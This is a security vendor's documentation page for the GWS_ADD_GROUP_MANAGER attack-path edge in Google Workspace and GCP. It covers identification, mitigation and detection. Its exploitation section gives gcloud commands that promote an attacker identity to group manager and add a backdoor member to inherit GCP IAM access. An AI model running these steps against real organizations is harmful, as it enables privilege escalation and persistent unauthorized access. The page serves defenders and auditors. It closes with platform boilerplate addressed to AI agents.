> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/gcp/gws_add_group_manager.md).

# GWS\_ADD\_GROUP\_MANAGER

## Summary

|                                |                                                                                               |
| ------------------------------ | --------------------------------------------------------------------------------------------- |
| **FSProtect ACL Alias**        | GWS\_ADD\_GROUP\_MANAGER                                                                      |
| **GWS Alias**                  | Add Group Manager                                                                             |
| **Affected Object Types**      | GWS Group                                                                                     |
| **Exploitation Certainty**     | Certain                                                                                       |
| **Granting Roles / Positions** | Google Workspace **Super Admin**, **Groups Admin** (directory role), existing **Group Owner** |

## Description

`GWS_ADD_GROUP_MANAGER` represents the ability to add new managers to a Google Workspace Group. Granting the `MANAGER` role to an identity delegates partial administrative authority: a manager can add and remove group members, approve membership requests, and promote existing members to `MANAGER`. A manager cannot assign the `OWNER` role, delete the group, or modify group-level settings.

The security significance of this edge is the two-step escalation chain it enables: `GWS_ADD_GROUP_MANAGER` → `GWS_GROUP_MANAGER` → `GWS_ADD_GROUP_MEMBER` → GCP IAM access. After a controlled identity is promoted to manager, it independently gains the ability to add members to the group without requiring any further owner action. The entire chain from promotion to GCP IAM inheritance can complete in minutes with two API calls.

Manager accounts are frequently overlooked during security reviews because alert policies tend to focus on ownership changes. A manager foothold also persists through group ownership transfers — if the group's owner is rotated or remediated, existing manager assignments are not automatically revoked.

## Identification

### gcloud CLI

```bash
# Find all GCP-bound groups across the organization (primary target list)
gcloud asset search-all-iam-policies \
    --scope='organizations/ORG_ID' \
    --query='memberTypes:group' \
    --format="table(resource, policy.bindings[].role, policy.bindings[].members)"
```

```bash
# List current owners who can assign the MANAGER role
GROUP_EMAIL="target-group@example.com"
gcloud identity groups memberships list \
  --group-email=$GROUP_EMAIL \
  --format="table(preferredMemberKey.id, roles[0].name)" | grep -E "OWNER|MANAGER"
```

### Google Admin Console

1. Open **Google Admin Console** (`admin.google.com`) → **Directory** → **Groups**.
2. Click the target group → **Members**.
3. Filter by **Role: Owner** — these identities can assign the MANAGER role.
4. Check **Admin roles** → **Groups Admin** for directory-level admin identities.

## Exploitation

```bash
# Step 1: Promote controlled identity to MANAGER
GROUP_EMAIL="privileged-group@example.com"
gcloud identity groups memberships add \
  --group-email=$GROUP_EMAIL \
  --member-email=attacker@example.com \
  --roles=MANAGER

# Step 2: As the new manager, add a second controlled identity as MEMBER to inherit GCP IAM
gcloud identity groups memberships add \
  --group-email=$GROUP_EMAIL \
  --member-email=backdoor@example.com \
  --roles=MEMBER

# Wait 1-5 minutes for IAM propagation
gcloud projects list
```

## Mitigation

1. **Convert GCP-bound groups to security groups** — restricts all membership and role changes to Super Admins only:

   ```bash
   gcloud identity groups update GROUP_EMAIL \
     --labels=cloudidentity.googleapis.com/groups.security=''
   ```
2. **Minimize manager assignments** — assign the MANAGER role only when membership delegation is genuinely required. Audit and revoke unnecessary managers regularly.
3. **Restrict manager assignment to Super Admins only** via Google Admin Console → group settings → disable owner-delegated manager assignment.
4. **Alert on MANAGER role assignments** for groups with GCP IAM bindings, not just OWNER changes.

## Detection

Monitor group role changes in **Google Workspace Audit Logs**. The two-step chain (manager promotion → member addition) requires correlating two separate audit events, potentially across the `admin` and `groups_enterprise` streams.

### Google Admin Console

1. Open **Google Admin Console** (`admin.google.com`) → **Reporting** → **Audit and investigation** → **Groups Enterprise log events**.
2. Filter by **Event Name: Add member** or **Update member** where role = MANAGER.
3. For the same group, look for a subsequent **Add member** with role = MEMBER performed by the same identity (the exploitation chain indicator).

### Cloud Logging (GCP)

```bash
# Monitor MANAGER role assignments and all subsequent member additions
gcloud logging read \
  'logName="organizations/ORG_ID/logs/cloudaudit.googleapis.com%2Factivity" AND protoPayload.serviceName="admin.googleapis.com" AND (protoPayload.methodName="google.admin.AdminService.addGroupMember" OR protoPayload.methodName="google.admin.AdminService.updateGroupMember")' \
  --format="table(timestamp, protoPayload.authenticationInfo.principalEmail, protoPayload.request.groupKey, protoPayload.request.memberKey, protoPayload.request.role)"
```

## References

* <https://www.netspi.com/blog/technical-blog/cloud-pentesting/escalating-privileges-in-google-cloud-via-open-groups/>
* <https://cloud.google.com/iam/docs/groups-in-cloud-console>
* <https://developers.google.com/admin-sdk/directory/reference/rest/v1/members/insert>
* <https://cloud.google.com/identity/docs/reference/rest/v1/groups.memberships>
* <https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview>
* <https://support.google.com/a/answer/167430>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.forestall.io/fsprotect/edges/gcp/gws_add_group_manager.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.